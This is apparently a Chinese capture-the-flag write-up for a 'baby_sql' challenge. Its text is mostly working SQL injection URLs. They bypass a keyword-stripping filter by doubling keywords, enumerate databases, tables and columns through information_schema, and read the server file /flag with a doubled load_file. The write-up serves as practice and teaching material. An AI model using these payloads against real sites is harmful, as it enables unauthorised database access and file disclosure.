http://www.bmzclub.cn/challenges#baby_sql
简单的SQL注入,过滤了一些关键字符,但是过滤进制都是直接替换为空
。有机可趁,直接双写绕过
/check.php?username=mochu7'oorrder/**/bbyy/**/4%23&password=mochu7
/check.php?username=mochu7'uniunionon/**/selselectect/**/1,2,3%23&password=mochu7
/check.php?username=mochu7'uniunionon/**/selselectect/**/1,2,group_concat(schema_name)/**/frofromm/**/infoorrmation_schema.schemata%23&password=mochu7
/check.php?username=mochu7'uniunionon/**/selselectect/**/1,2,group_concat(table_name)/**/frofromm/**/infoorrmation_schema.tables/**/whwhereere/**/table_schema='geek'%23&password=mochu7
/check.php?username=mochu7'uniunionon/**/selselectect/**/1,2,group_concat(column_name)/**/frofromm/**/infoorrmation_schema.columns/**/whwhereere/**/table_name='geekuser'%23&password=mochu7
注入得到的信息
information_schema,test,mysql,performance_schema,geek
Table_in_geek: b4bsql,geekuser
Column_in_b4bsql: id,username,password
没有找到flag相关信息,尝试读取服务器文件
/check.php?username=mochu7'uniunionon/**/selselectect/**/1,2,load_file('/flag')%23&password=mochu7
直接将'/flag'
给显是出来了?也没报错。怀疑可能也将load_file
给替换为了空。跟前面一样的套路
/check.php?username=mochu7'uniunionon/**/selselectect/**/1,2,loadload_file_file('/flag')%23&password=mochu7